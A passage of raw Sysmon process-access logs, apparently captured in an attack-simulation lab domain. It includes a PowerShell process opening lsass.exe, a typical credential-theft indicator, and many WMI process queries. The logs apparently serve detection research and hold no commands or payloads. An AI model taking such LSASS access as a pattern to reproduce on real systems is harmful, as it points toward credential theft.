16:52:52.434{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.434{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237116Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237115Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237114Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237113Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237112Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.418{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla 